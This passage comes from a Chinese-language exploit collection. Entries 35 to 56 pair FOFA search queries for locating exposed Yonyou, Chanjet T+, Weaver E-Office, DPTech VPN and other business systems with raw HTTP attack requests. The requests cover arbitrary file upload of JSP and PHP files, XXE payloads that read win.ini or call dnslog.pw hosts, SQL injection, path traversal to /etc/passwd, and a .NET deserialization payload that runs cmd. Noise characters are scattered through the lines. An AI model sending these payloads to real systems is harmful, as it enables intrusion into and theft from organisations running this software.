Accept-Encoding: gzip, deflate$ A& }2 O2 Q+ {& v6 K1 k
Accept: */*
% P8 U& C3 _: r. S' v/ \Connection: keep-alive; D8 C. G7 X+ y# ^' A
4 H* y% E- B* M3 l( b: e
& P _" n' H- M3 y g" v35. 用友NC-Cloud importhttpscer任意文件上传
0 w5 V$ L% {+ xFOFA:app="用友-NC-Cloud"
# L8 W! n0 E1 i; {( h. FPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
+ o7 n C [% W" h9 X* aHost: 203.25.218.166:8888& i, r3 e, S$ U- k5 F
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info' t; Z+ e1 R- S
Accept-Encoding: gzip, deflate
+ \* f/ ~" |# }1 w" j( w9 N. KAccept: */*
. ^- r- ~# T" ]0 _0 j9 qConnection: close
3 u; _8 G% o! ]+ jaccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA: q" i% s+ O. @# Q+ X( N& |+ f# p
Content-Length: 190
" e& c7 v1 z9 M! [) c& iContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0! r0 d, p9 q' t: _
% a3 z- x2 x: ]$ P( r( ~6 R--fd28cb44e829ed1c197ec3bc71748df04 p) D7 W. c* W
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"3 W4 R" K' H9 q' W3 L; z
! }& u6 H9 b8 ^<%out.println(1111*1111);%>
0 _$ t& V* N, s% w! p' Y--fd28cb44e829ed1c197ec3bc71748df0--
5 _: w* u4 B' b8 u
* w$ B4 i7 |1 S' S9 s _' h. o% O( W9 `
36. 用友NC-Cloud soapFormat XXE
9 c4 a. g) O# F! v( p1 q, KFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"1 m; c" F( e/ r' U3 k6 e* j4 _
POST /uapws/soapFormat.ajax HTTP/1.1
* \% W. C& r: E9 C8 p; RHost: 192.168.40.130:89892 N- v5 T& l8 p0 @& s U B& b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0+ m3 S% U; q* E3 Z
Content-Length: 263
9 c9 j, }' Z A) n5 ^' pAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8& u5 J; b ~ o1 i9 o2 m1 {# _
Accept-Encoding: gzip, deflate2 g, W( v7 H' G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 p2 T8 U; U) v9 g- `
Connection: close
) V3 _; ^% m; b3 ?' s- Q* u. VContent-Type: application/x-www-form-urlencoded- V4 Q% c% x3 `- z! x% n: i
Upgrade-Insecure-Requests: 1
6 m4 R: J$ `& {% G2 y3 `) D, e2 |7 w- O0 t% u+ ~: X
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a! C: _# ]" Z+ ?" }5 H
& X- e7 M5 N% S( z: r" Q
4 e0 u# J3 e( F- K
37. 用友NC-Cloud IUpdateService XXE
( q- j: B% O. F; eFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"2 h, G {* |3 G: b
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
s) \0 p( v+ X$ ~$ w, J8 EHost: 192.168.40.130:8989& O! [. K& V4 E+ G$ T2 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
! i \: g3 x! H& E$ W `Content-Length: 421' E6 R0 W% r/ R5 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
4 y/ x) K9 v: y, ^Accept-Encoding: gzip, deflate( I$ U. p) L9 \" m5 }% [1 n4 Z5 @
Accept-Language: zh-CN,zh;q=0.90 m: T; J/ m% W/ g# T( I r
Connection: close
! H* D, p+ g2 u: VContent-Type: text/xml;charset=UTF-8
' |3 \0 P' _' p2 b& \: q' S& oSOAPAction: urn:getResult/ f9 o4 | P, c- k! S2 z
Upgrade-Insecure-Requests: 13 {+ Q: T& v' N& x8 M' `1 v$ _' h
% ~4 ~2 ]4 N+ C# z
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
8 l, Z, d' L5 D* {3 Z<soapenv:Header/>& I. n9 o6 ^. w
<soapenv:Body>
" T8 c: q$ f$ t( C) `<iup:getResult>3 K5 J9 c5 U r" B/ u$ b2 b
<!--type: string-->
A; r: `5 m5 k j% X<iup:string><![CDATA[
' }* [5 s* h6 \; F* F- E, u<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
9 A. t: z6 S' }8 ^# A; n<xxx/>]]></iup:string>, o3 u5 L0 t5 r. B
</iup:getResult>4 F/ c6 W" H7 x2 P
</soapenv:Body>8 o# f3 r5 R3 V
</soapenv:Envelope>
2 M, X5 J z# j) {! ~* s/ u( W7 G$ z+ ?9 M) i
2 A4 P) N0 l: Z$ ~( I5 }0 _+ q: N
" j4 R' S5 ~5 T1 S6 f9 s8 |6 J* G
38. 用友U8 Cloud smartweb2.RPC.d XXE
R. g! s; G4 c: JFOFA:app="用友-U8-Cloud"" d7 B5 ^6 `" a; N8 y6 t5 v( A
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
/ u# r V" f1 pHost: 192.168.40.131:8088
& q& J' B) x9 A- @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
- ~; ?+ `' q/ \& C. d& A" q3 WContent-Length: 260
0 Z6 c3 o3 A6 u+ q& H: J1 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
& k3 ?2 i4 [2 p3 F7 s/ nAccept-Encoding: gzip, deflate6 V; R% b# g" V
Accept-Language: zh-CN,zh;q=0.9
8 I- g4 J0 k8 G2 _Connection: close& L2 M9 \, n& T8 ]% O
Content-Type: application/x-www-form-urlencoded# T, ?. a4 g, x" C0 X+ z
6 H% ?- E( M& U" k. M__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
3 Z, O" {* ?( A9 V
; p/ G' h! I8 p1 e' \: n* u
$ [& D- D& K( } B" g, r8 ^39. 用友U8 Cloud RegisterServlet SQL注入2 A# G( @' K0 l6 L3 W$ }5 l
FOFA:title="u8c"
+ f4 v8 G3 a4 D t$ i+ CPOST /servlet/RegisterServlet HTTP/1.1
/ T$ F/ o8 `- R+ h" \2 t8 _- ]Host: 192.168.86.128:8089, S+ s2 Y7 O: H2 g [1 e& `
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36, |' T# H$ q" x; h
Connection: close
' I0 i+ f ^ }: F2 VContent-Length: 85
' p& k" b N2 ]1 Z4 D/ `& `Accept: */*
7 h9 }8 X$ Z4 E3 HAccept-Language: en4 t& y' W& u6 G0 w' T% e) g. W+ o
Content-Type: application/x-www-form-urlencoded
7 {9 V1 K# J- q0 _X-Forwarded-For: 127.0.0.1
4 m! N* x8 S% E ]0 V7 D5 bAccept-Encoding: gzip7 M) N* s0 C% ?- t1 f
& I+ G6 E& a" K. {4 D
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--2 t& E& w* I$ H" ^2 Z. m; `5 g+ r' T
F0 s" l8 z- K% o$ i- S
1 Y, F4 m- A8 g) j40. 用友U8-Cloud XChangeServlet XXE
! N2 f. Z; F0 h2 y9 HFOFA:app="用友-U8-Cloud"
" ]8 T! R8 R: U. L9 sPOST /service/XChangeServlet HTTP/1.1
! C8 J# F' S4 _8 gHost: x.x.x.x, |9 X- q. U9 u- ?
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+ h/ M% }8 g" \- p& M+ r/ SContent-Type: text/xml
- [2 W2 v1 N6 j5 ]Connection: close
' ^& ^, M5 `2 B9 r9 a6 I+ b! e; l+ s3 L: M4 y7 o C/ x
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>" k2 ~( J4 c3 c# G( n
# V* h) e1 m: d6 F5 d4 C
( A, W# ]: o+ `) e0 ?41. 用友U8 Cloud MeasureQueryByToolAction SQL注入 \3 I6 G1 N& A' w+ l ]! w# g
FOFA:app="用友-U8-Cloud"
: T0 _' ^. [0 }# [- e' v; eGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
$ s& K$ Z6 w2 j6 u) V5 mHost:
$ t: e7 k5 F4 `3 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15+ [7 {* |0 t/ L
Content-Type: application/json+ J' q! k# B: R3 {5 ~& }3 Y
Accept-Encoding: gzip" B; m( Z7 k( n9 [, l p2 t6 x/ A
Connection: close8 _& Z9 d. p7 N) O) N8 n
' g1 Y9 {' J0 |6 K( p U* y
# E6 @; i2 l2 T4 l" h, M& b( M
42. 用友GRP-U8 SmartUpload01 文件上传
- P9 n( T, w( _: u# y7 R# VFOFA:app="用友-GRP-U8"
1 x' `4 {. m3 {; S. U3 D5 pPOST /u8qx/SmartUpload01.jsp HTTP/1.1
8 Z, K4 \0 v' R [' u& X* I5 t# N2 UHost: x.x.x.x$ u6 _& U' f, Y" B7 q1 C
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
3 h, h/ V! C, a, mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
, i1 m: e6 |5 p$ g: [
2 }+ a! }4 t& K/ o0 m# dPAYLOAD
8 D6 O$ I' P" e( l4 Y' c- G" p0 ]; {+ |, Z) S. ^+ O- I
. b. ] \' O* q( `5 ohttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
P6 F6 _( I$ H( d7 k
: b$ i9 `. {3 h43. 用友GRP-U8 userInfoWeb SQL注入致RCE
9 H6 w, g$ u, {+ u) V" w% bFOFA:app="用友-GRP-U8"
# [- _1 p" l# f1 B" b/ i. IPOST /services/userInfoWeb HTTP/1.1
2 L) K9 d( U1 I3 iHost: your-ip
; o1 V7 L7 U9 C* bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
5 I5 U) D7 `" F& l/ |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, M* B2 Z& G x/ L- v- f$ j
Accept-Encoding: gzip, deflate
5 j$ S6 M% H! o) v2 A+ {Accept-Language: zh-CN,zh;q=0.9
. [5 A: n3 c' U& _9 nConnection: close- M. o1 ]& J8 N( g! \
SOAPAction:
+ f0 P1 q ?1 N& y- tContent-Type: text/xml;charset=UTF-8
. K+ R# ^" L' n; d$ w5 L) y) m& t* z9 c9 r
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
# q( I) L- _/ `- z: d <soapenv:Header/>
4 m& k5 E8 t$ L/ L <soapenv:Body>1 w$ \! Y6 D! R7 D2 W2 b, V( }
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
5 ^) \! w- ^9 y5 }' R) [ <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>: g+ b. S& |* E8 \
</ser:getUserNameById>
2 {- O. m- c2 G( ~ </soapenv:Body> Y8 t4 X L) m. }( I# |/ p/ T
</soapenv:Envelope>
+ `( ]$ C7 u) w4 ?" g1 R# W t
7 f" \; I& [8 O
& G' ^+ _. g9 ], T/ [4 l, j44. 用友GRP-U8 bx_dj_check.jsp SQL注入- ~+ V2 d) z4 v) c* g6 N1 z4 k
FOFA:app="用友-GRP-U8"
9 S" b8 C5 O# m Y) ] pGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
9 |1 J3 h1 h2 z7 WHost: your-ip
p' f- `% j( M$ l! i7 V2 o% [* h& I0 aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36, f: A: D4 b- R S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
\+ d, M! n' Y9 j" YAccept-Encoding: gzip, deflate# p( z# k+ g8 ?* ]2 t# [
Accept-Language: zh-CN,zh;q=0.9' q4 J. [' `# P0 b0 T0 }
Connection: close- n" k {. C9 e9 t- c8 e
. V( M |( g% `0 f/ [" i
! c9 D" {) {: ]( T+ T- T45. 用友GRP-U8 ufgovbank XXE" m+ ]" A8 w, f% ?, X
FOFA:app="用友-GRP-U8"$ u: }. U6 T9 S v: L
POST /ufgovbank HTTP/1.1) r' e# C0 ~4 W7 q0 B" t
Host: 192.168.40.130:222; k$ Q1 [+ X, i- O5 i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
g6 E. z& w+ m, Q$ F# P9 eConnection: close
" P+ W! n, C5 p# p; a& y: q1 QContent-Length: 161
9 h$ A* {, R: }# jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
G5 h2 J' [% ]5 g, ?7 CAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.24 G) j/ _+ ~3 A' _9 H! q7 U |
Content-Type: application/x-www-form-urlencoded& F8 A% v. T/ O
Accept-Encoding: gzip
3 G3 N2 x; G$ C' f: p( i. }$ G. h! H# R0 v+ G* \ P
reqData=<?xml version="1.0"?>* x6 i7 ?4 J6 q0 O* q
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest& d5 z. w ] ]- p0 e* V, I
% a. i* `: u) G) e- g+ S+ f0 Y& D
5 I' x7 `$ R+ y" u' h1 ?6 q
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
% ^5 `7 U! H9 F0 R5 ? h& EFOFA:app="用友-GRP-U8"; t" l( U( X% W3 |
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
8 X @; n8 a: r, d3 S' WHost: your-ip) y, F1 f8 c+ M/ @1 u" U& f/ K! B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
1 @& ?2 V2 n1 T n2 b& t: |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; a- y- |! s6 z6 {+ HAccept-Encoding: gzip, deflate
" e1 `5 n- { J" Y* D, mAccept-Language: zh-CN,zh;q=0.9% J0 x h' R0 ]: i& |* S5 X N5 h
Connection: close
8 Q3 X V* M8 C6 U5 I, b: t2 @
1 P- @& J- A6 K9 ~! }: J+ v5 B. c
47. 用友GRP A++Cloud 政府财务云 任意文件读取% L/ i8 e+ \; \. u$ H# i
FOFA:body="/pf/portal/login/css/fonts/style.css"
o& X) ?4 ?# M! Z# QGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1! o9 ? N+ B0 [/ P4 d
Host: x.x.x.x$ W- L' n: t8 X1 g# |4 W2 p
Cache-Control: max-age=0* p; v+ |5 I- E% F4 o- f+ C
Upgrade-Insecure-Requests: 1
% j' e8 b6 X5 J" ZUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36* I. ~# u6 P T5 G) v/ F; Y" ~/ Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) S' {4 B n: R. M i. O
Accept-Encoding: gzip, deflate, br/ M; x7 }" O8 \
Accept-Language: zh-CN,zh;q=0.93 Y+ ]7 J0 ?. ^7 @2 m
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT% ?* C, Y' e7 E
Connection: close; ^% j7 t2 y5 P" Z4 Q
& g. s# ]; a5 ?& f/ N
: P* h+ y/ @% @. k% S) F3 i
' O" K R9 s$ v) k; j48. 用友U8 CRM swfupload 任意文件上传. d4 C+ j. i+ A/ q: Y& }$ Q
FOFA:title="用友U8CRM"
, r* i: y" V3 h6 G8 EPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
: W8 D/ N1 R: f6 ^Host: your-ip$ Q, I+ n7 u$ T# S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
. f8 s. v d' A$ s) NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 W& } g) C# v9 T ZAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; @3 I% X+ H7 W7 n( c+ Y4 W# J
Accept-Encoding: gzip, deflate: i- F2 e% n( s% ?& q
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855+ h) l2 a7 i6 Q# l! G! l' S
------269520967239406871642430066855
2 w/ E- i# Q' H& Y% kContent-Disposition: form-data; name="file"; filename="s.php"
5 d' X% E x8 ^1231
* Q! G& Q7 Z [4 |Content-Type: application/octet-stream1 L: R. V4 c( ]$ g
------2695209672394068716424300668556 O, ?+ B" F" U, D& j$ j. _: |4 F
Content-Disposition: form-data; name="upload"% d( l/ n$ _" Y" Z) B
upload+ g" q+ Y& T4 n, a( I' O, \0 c' n3 @
------269520967239406871642430066855--9 E9 l, s6 S/ n/ ~' V
5 n" b, F/ j" _
7 Y8 u2 h+ M+ J8 e" i+ F7 `49. 用友U8 CRM系统uploadfile.php接口任意文件上传5 l# w; a: k/ [4 d! A! d7 {
FOFA:body="用友U8CRM"
" G& l6 `/ \/ ]/ F, A5 f" x! f9 `* O, i4 N" J% W; f1 i S
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
3 K1 U; V! F0 K' M+ u0 K1 ?Host: x.x.x.x% B7 J: R" x; Y* Y0 T4 E9 ]& B# Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
: E& T- ^2 E0 a; u. |5 kContent-Length: 329
& O0 O( |7 p$ ], h8 kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* o n: l/ Y- D. |' I+ `Accept-Encoding: gzip, deflate$ F0 M, y: A; a( f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 r# p; w# f& `/ ]
Connection: close
2 A7 t; M; r% GContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
7 P' \, X- Q( E4 O3 o
! d0 i: r: k( o* f-----------------------------vvv3wdayqv3yppdxvn3w
% ?. w# B7 c1 b4 UContent-Disposition: form-data; name="file"; filename="%s.php "1 i' e9 r& m$ E9 {
Content-Type: application/octet-stream
/ u/ ?, s1 W/ Q. j" C4 L; {# g/ @# Z" D9 n
wersqqmlumloqa' b; @* f U# q9 x
-----------------------------vvv3wdayqv3yppdxvn3w
7 F9 W3 W/ r7 g9 j3 |* d# \Content-Disposition: form-data; name="upload"' j) y( H6 k8 { N* X2 H- ^' x% k+ ?
/ \4 b8 q0 Y* l5 \! G& Eupload0 e: D4 o7 Z, V2 F! [
-----------------------------vvv3wdayqv3yppdxvn3w--
# A Z/ D7 D x3 s6 Z
* j, F: K- ^* m* R" [
$ z8 K# X# `% _; A( G. X( dhttp://x.x.x.x/tmpfile/updB3CB.tmp.php
: C# t9 J5 i2 ^) ]4 Z9 r; P0 j) \4 U Y% D' r! @
50. QDocs Smart School 6.4.1 filterRecords SQL注入# E; R( Y# T- t) T5 [1 E
FOFA:body="close closebtnmodal"3 c. m# e" w- v2 L- P, y
POST /course/filterRecords/ HTTP/1.1& K# a t% y- G& f
Host: x.x.x.x
[) G/ M4 l; T* r' u" Z" `User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36; U! z% _4 |- _! i2 @8 |/ j0 `
Connection: close \' U( D0 a$ `) J" ]6 J
Content-Length: 224' F8 V: Q3 j) o- ?
Accept: */*
' `3 M2 ]- D8 lAccept-Language: en& d) ]/ O6 F, M- E& C T
Content-Type: application/x-www-form-urlencoded
4 {/ C% l& c# k2 @: q# \5 O C- g) qAccept-Encoding: gzip' B9 ~& e7 U- V) B0 A& C9 s3 K
0 l" @8 T t7 N) `/ f
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1! D! N! `2 e4 H& n/ X! E6 i( }
2 k5 N7 L6 B( `2 r( x
* h/ j* J3 }7 T8 Y; ?51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入" @1 q& J( {8 L6 N5 N
FOFA:app="云时空社会化商业ERP系统"# R$ s# H( r$ Z& [3 \2 i. E
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1# m0 s y. @3 T5 X* {
Host: your-ip
% L, B8 x" o: b# Z, s5 l5 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
2 n$ F" [' L% Z/ P# U9 B7 UAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9( `4 o5 [- n7 a) W: A1 ]
Accept-Encoding: gzip, deflate a2 u+ s( f8 C. q, n1 Z+ L6 F& g
Accept-Language: zh-CN,zh;q=0.9
7 S9 @/ B. s- B+ CConnection: close1 `! u) {5 l6 `* i8 [( Z' W
/ |! T, k. R1 @' Q4 g# e& {1 W& |
: w, w# V% W J M% k, N
52. 泛微E-Office json_common.php sql注入, A: w* }; \* U8 D& W/ k. A4 M
FOFA:app="泛微-EOffice"$ D8 Q% Y6 l( l. e7 A
POST /building/json_common.php HTTP/1.1
$ U, w7 N' `6 k2 @Host: 192.168.86.128:8097
1 o4 b. w: _; xUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36& _9 k8 K) [7 H) W. d
Connection: close
2 ~) c* ~8 A3 s% gContent-Length: 87
# }' C N7 P4 D; KAccept: */*- d, y9 U3 z: G: m' |; J
Accept-Language: en" K8 D" v4 x: j0 [4 [8 x0 Z
Content-Type: application/x-www-form-urlencoded7 E! E9 z4 D9 n( R& S/ c- [: Y/ ^
Accept-Encoding: gzip
3 ~4 b( S* F% w8 |& L# K
$ D; t8 }+ Q, V* p" [tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333# e) n2 I: U2 S3 e' q# s O
& a: h) d0 U- \8 `
! ]0 y Y5 Z- j0 _1 y53. 迪普 DPTech VPN Service 任意文件上传3 Y. _8 V5 ^5 Q" E' [4 T" u
FOFA:app="DPtech-SSLVPN"
8 o" v8 |$ U4 h. F+ o! \& B/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
* q: w2 A9 F1 h4 X; N. S1 i6 C+ T" _6 ]
9 }: E7 U/ u# {4 F
54. 畅捷通T+ getstorewarehousebystore 远程代码执行1 l0 E& z& ]( P5 L O
FOFA:app="畅捷通-TPlus"$ }: o# x6 g& @8 o$ \* u' B- f6 J+ ]
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件" b) p+ T, ~% a+ c+ d4 A) z
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
" c5 D f- ^% b& |: o2 f) A& f1 e% e) I+ P- \
) v9 M8 E0 T# V; P( S9 V! t
完整数据包. i2 }% @/ q4 O9 L4 q+ z( V
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1. G+ m0 M' Y3 ~0 z
Host: x.x.x.x
# x, U/ w4 Q/ F( m5 i& TUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F. b9 D+ x; A1 `# P" M! ?
Content-Length: 593! D( |3 i7 m2 G$ L1 H4 o
* K/ U% g2 t7 S8 K) _{3 {# v I9 W" L& [6 Q4 d
"storeID":{
0 J2 i% u, G! Z "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",9 F$ |% V6 y4 N1 v( {
"MethodName":"Start",6 T, e' ^& m( }8 T5 H
"ObjectInstance":{
" J# z0 S* l. q! d/ ] "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
- g* O# Y- V3 n, N+ e# B) p "StartInfo":{+ m3 I( i1 X6 o
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",* M R7 D. X, j9 N3 U% p0 g) N
"FileName":"cmd",
+ k% _$ ~2 ~0 v; @2 T "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
# B$ i7 w+ ^6 x( ^ }
( X" a% r4 w/ k }
2 _& \$ C# l N% m' y& p! U }" A! `$ J4 H+ K0 y
}
1 X) j _6 s% J6 A5 y: y
# h! e) ~3 A: c# w4 a
% p. y% k' I+ v$ I/ Q9 j第二步,访问如下url
* s1 H8 q+ i5 l$ b6 ]1 L/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt4 E- f& m* K* M' D- z u4 b
% ]2 P g" i D0 b* K! z
/ x% s0 d6 v( q7 m' P
55. 畅捷通T+ getdecallusers信息泄露
+ V3 `6 v8 S2 x/ UFOFA:app="畅捷通-TPlus"
% w8 ]. o+ O/ Q1 k第一步,通过
# ^: Y6 q8 H0 K2 K/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
( S7 b. e2 n7 V6 ?& }第二步,利用获取到的Cookie请求
- \& @3 h5 {4 O4 _/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers* t. P* ?) S8 ^: Z" ~0 O
- `4 e3 D; P2 r2 L2 {56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
# O* m! u" J( cFOFA: app="畅捷通-TPlus"
/ l, x" W2 o3 nPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.10 C$ t6 ~2 F& _4 ?
Host: x.x.x.x$ f. ]% T% c5 C7 Q3 Z% k
